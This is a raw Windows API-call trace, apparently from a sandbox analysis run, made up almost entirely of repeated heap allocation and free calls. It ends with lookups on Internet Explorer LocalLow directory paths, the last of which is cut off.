[0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d868 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") 